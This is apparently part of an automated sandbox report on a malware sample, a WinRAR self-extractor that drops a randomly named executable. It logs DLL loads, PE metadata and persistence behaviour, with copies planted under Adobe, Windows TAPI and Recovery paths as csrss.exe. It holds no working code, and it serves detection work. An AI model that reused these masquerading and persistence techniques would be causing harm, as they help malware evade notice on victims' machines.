                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                          Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                          Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                          Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: mscoree.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: apphelp.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: version.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: wldp.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: profapi.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: sspicli.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: ktmw32.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: amsi.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: userenv.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: winnsi.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: rasapi32.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: rasman.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: rtutils.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: mswsock.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: winhttp.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: winmm.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: winmmbase.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: mmdevapi.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: devobj.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: ksuser.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: avrt.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: audioses.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: powrprof.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: umpdc.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: msacm32.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: midimap.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: edputil.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: dwrite.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: windowscodecs.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeDirectory created: C:\Program Files\Windows Multimedia Platform\ZWgKQlTqcrSB.exeJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeDirectory created: C:\Program Files\Windows Multimedia Platform\b2c372d662fd88Jump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeDirectory created: C:\Program Files\Adobe\ZWgKQlTqcrSB.exeJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeDirectory created: C:\Program Files\Adobe\b2c372d662fd88Jump to behavior
                          Source: updIMdPUj8.exeStatic file information: File size 2937141 > 1048576
                          Source: updIMdPUj8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                          Source: updIMdPUj8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                          Source: updIMdPUj8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                          Source: updIMdPUj8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: updIMdPUj8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                          Source: updIMdPUj8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                          Source: updIMdPUj8.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: updIMdPUj8.exe
                          Source: updIMdPUj8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                          Source: updIMdPUj8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                          Source: updIMdPUj8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                          Source: updIMdPUj8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                          Source: updIMdPUj8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeFile created: C:\BridgeSavesMonitor\__tmp_rar_sfx_access_check_6801140Jump to behavior
                          Source: updIMdPUj8.exeStatic PE information: section name: .didat
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B3F640 push ecx; ret 0_2_00B3F653
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B3EB78 push eax; ret 0_2_00B3EB96
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeCode function: 5_2_00007FFD9B9E3CB9 push ebx; retf 5_2_00007FFD9B9E3CBA
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeCode function: 5_2_00007FFD9BBBAC5C push edi; retf 5_2_00007FFD9BBBAC7A
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeCode function: 5_2_00007FFD9BBBABF2 push ecx; retf 5_2_00007FFD9BBBABFA
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeCode function: 5_2_00007FFD9BBBAC1C push esp; retf 5_2_00007FFD9BBBAC3A
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeCode function: 5_2_00007FFD9BBBA6D3 push ss; retf 5_2_00007FFD9BBBA70A
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeCode function: 5_2_00007FFD9BBBA5CC push es; retf 5_2_00007FFD9BBBA5CA
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeCode function: 5_2_00007FFD9BBBA50D push es; retf 5_2_00007FFD9BBBA5CA
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeCode function: 5_2_00007FFD9BF7C5C9 push ebx; iretd 5_2_00007FFD9BF7C5CA
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B8FD2A5 pushad ; iretd 7_2_00007FFD9B8FD2A6
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9BA1953C push ebx; ret 7_2_00007FFD9BA1954A
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9BAE2316 push 8B485F92h; iretd 7_2_00007FFD9BAE231B
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9B8ED2A5 pushad ; iretd 8_2_00007FFD9B8ED2A6
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9BA03EEE pushad ; iretd 8_2_00007FFD9BA03F9B
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9BAD2316 push 8B485F93h; iretd 8_2_00007FFD9BAD231B
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD9B8FD2A5 pushad ; iretd 10_2_00007FFD9B8FD2A6
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD9BA12315 pushad ; iretd 10_2_00007FFD9BA1232D
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD9BAE5FD8 pushad ; iretd 10_2_00007FFD9BAE5FD9
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD9BAE2316 push 8B485F92h; iretd 10_2_00007FFD9BAE231B
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B8ED2A5 pushad ; iretd 11_2_00007FFD9B8ED2A6
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9BA03EFE pushad ; iretd 11_2_00007FFD9BA03F8B
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9BAD2316 push 8B485F93h; iretd 11_2_00007FFD9BAD231B
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD9B90D2A5 pushad ; iretd 13_2_00007FFD9B90D2A6
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD9BAF2316 push 8B485F91h; iretd 13_2_00007FFD9BAF231B
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeCode function: 24_2_00007FFD9BBC9E10 pushad ; ret 24_2_00007FFD9BBC9E11
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeCode function: 24_2_00007FFD9BF8D0E0 push FFFFFFE8h; retf 24_2_00007FFD9BF8D0F1
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeCode function: 24_2_00007FFD9C1051EB push esp; iretd 24_2_00007FFD9C1051EC
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeCode function: 24_2_00007FFD9C105230 push esp; iretd 24_2_00007FFD9C105231

                          Persistence and Installation Behavior

                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Recovery\csrss.exeJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile written: C:\Program Files\Adobe\ZWgKQlTqcrSB.exeJump to behavior
                          Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\eRokfvkG.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\cXlUovHQ.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\fEwcKMUX.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\NKXFMJFr.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\XpVNKoNn.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\MJbpFLtL.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Program Files\Windows Multimedia Platform\ZWgKQlTqcrSB.exeJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\TuQMKFja.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\EOLhHxkb.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\KCawqqLw.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\DWtPcxKJ.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\yeGIODyj.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\cPBBKMgL.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\zomqzklW.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\XXPuwSTl.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\kSAcnKQA.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\GUTYNdlI.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\yViIeRfn.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\zgCYVAKQ.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Program Files (x86)\Windows NT\Accessories\ZWgKQlTqcrSB.exeJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Program Files\Adobe\ZWgKQlTqcrSB.exeJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\nzLkJbeH.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\hbKlfOQH.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\QvCVTWQk.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\IECYOtkU.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\YqSdRlZU.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\oROSeukq.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\PHyNhJUm.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\OxfxrZpJ.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\AQlYVRJc.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\krNbnIjL.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\TkxwTWEx.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\aeWlDzVS.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\tahrXlpt.logJump to dropped file
